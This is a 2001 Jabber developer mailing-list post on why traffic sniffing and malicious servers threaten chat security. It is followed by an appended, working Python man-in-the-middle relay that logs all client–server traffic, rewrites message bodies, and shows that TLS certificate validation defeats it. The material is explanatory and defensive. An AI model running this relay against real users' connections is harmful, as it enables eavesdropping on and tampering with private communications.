[JDEV] RE: File Transfer [was buddy icons]

kadokev at msg.net
Tue Apr 10 09:45:21 CDT 2001

> One thing though, once the conversation has been snooped on, isn't the
> security already totally compromised?
It's a reasonable goal for any system to ensure that passive traffic sniffing
does not compromise the security. As was mentioned earlier, SSL, PGP, and
0K authentication can help in reaching this goal.

One design 'feature' that I like about Jabber is that all communication
is user-to-server and not directly user-to-user. This protects the client
from DoS attacks against your IP address (as is common on IRC) because your
IP address is never revealed to the other client.

Unfortunately, this design means that a malicious server operator can very
easily sniff, log, and even modify all communications to and from any user
logged in to that server. Even with PGP you still have traffic analysis, etc.

For example, without SSL (and without SSL certificate validation) I can create
a MITM attack: an XML forwarder that looks like your favorite Jabber server,
but actually logs/modifies all traffic, or even translates everything you
say into pig latin. I was hoping to release my proof of concept for this on
April 1st...

I suggest that we take this to the 'security' Jabber mailing list.

Kevin Kadow
MSG.Net, Inc.
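As an added example (not Kevin's proof of concept and not Jabber project code), the following Python sketch shows what the forwarder described in the message above amounts to: a relay that sits between a client and the real server, logs every chunk of the XML stream, and rewrites the text of each <body> into pig latin before passing it on. The upstream hostname and port, the listening port and the sample stanza are assumptions. The client_tls_context function shows the check that defeats such a relay: with certificate and hostname validation on, the forwarder's certificate fails the handshake; with them off (the weak setting), the forwarder can terminate TLS itself and this relay runs behind it unnoticed.

```python
"""Toy Jabber XML stream forwarder (added example, not the original poster's code).

Relays a plaintext client<->server stream, logs it, and rewrites <body> text.
Assumptions: the real server is at UPSTREAM_HOST:UPSTREAM_PORT (hypothetical),
and each recv() returns whole stanzas (a real relay would buffer to boundaries).
"""
import re
import socket
import ssl
import threading

UPSTREAM_HOST = "jabber.example.org"  # assumption: the server the victim meant to reach
UPSTREAM_PORT = 5222                  # assumption: legacy plaintext client port
LISTEN_PORT = 5222                    # assumption: where the victim's client is pointed

VOWELS = "aeiouAEIOU"
# Match either an XML character/entity reference (left alone) or a run of letters.
TOKEN_RE = re.compile(r"&[A-Za-z0-9#]+;|[A-Za-z]+")
# Match <body ...>text</body> in a chunk of stream bytes.
BODY_RE = re.compile(rb"(<body[^>]*>)(.*?)(</body>)", re.DOTALL)


def pig_latin_word(word: str) -> str:
    """'hello' -> 'ellohay', 'eat' -> 'eatway'; non-alphabetic input is returned as-is."""
    if not word.isalpha():
        return word
    if word[0] in VOWELS:
        return word + "way"
    for i, ch in enumerate(word):
        if ch in VOWELS:
            return word[i:] + word[:i] + "ay"
    return word + "ay"


def pig_latin(text: str) -> str:
    """Pig-latin every word, leaving entity references like &amp; intact so the XML stays valid."""
    def repl(m):
        tok = m.group(0)
        return tok if tok.startswith("&") else pig_latin_word(tok)
    return TOKEN_RE.sub(repl, text)


def rewrite_stanza(data: bytes) -> bytes:
    """Rewrite the text content of every <body> element found in a chunk of stream data."""
    def repl(m):
        body = pig_latin(m.group(2).decode("utf-8", "replace")).encode("utf-8")
        return m.group(1) + body + m.group(3)
    return BODY_RE.sub(repl, data)


def pump(src: socket.socket, dst: socket.socket, label: str, log: list) -> None:
    """Copy bytes src->dst until EOF, recording each chunk and rewriting bodies in flight."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append((label, data))          # the 'sniff and log' half of the attack
            dst.sendall(rewrite_stanza(data))  # the 'modify' half of the attack
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_once(listen_port: int, log: list) -> None:
    """Accept one client, connect to the real server, and relay both directions."""
    with socket.create_server(("0.0.0.0", listen_port)) as srv:
        client, _ = srv.accept()
    upstream = socket.create_connection((UPSTREAM_HOST, UPSTREAM_PORT))
    threads = [
        threading.Thread(target=pump, args=(client, upstream, "c->s", log), daemon=True),
        threading.Thread(target=pump, args=(upstream, client, "s->c", log), daemon=True),
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    upstream.close()


def client_tls_context(validate: bool) -> ssl.SSLContext:
    """The client-side check that defeats the relay.

    validate=True: CA-rooted certificate validation plus hostname check, so a
    forwarder presenting its own certificate for jabber.example.org fails the
    handshake. validate=False: the weak setting the attack depends on.
    """
    ctx = ssl.create_default_context()
    if not validate:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


if __name__ == "__main__":
    captured: list = []
    serve_once(LISTEN_PORT, captured)
    for direction, chunk in captured:
        print(direction, chunk[:80])
```

Pointing a client at this relay instead of the real server (a DNS or hosts-file change, or just a misconfigured server address) is all the "looks like your favorite Jabber server" part requires on a plaintext connection; the client only notices if it insists on a validated server certificate.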
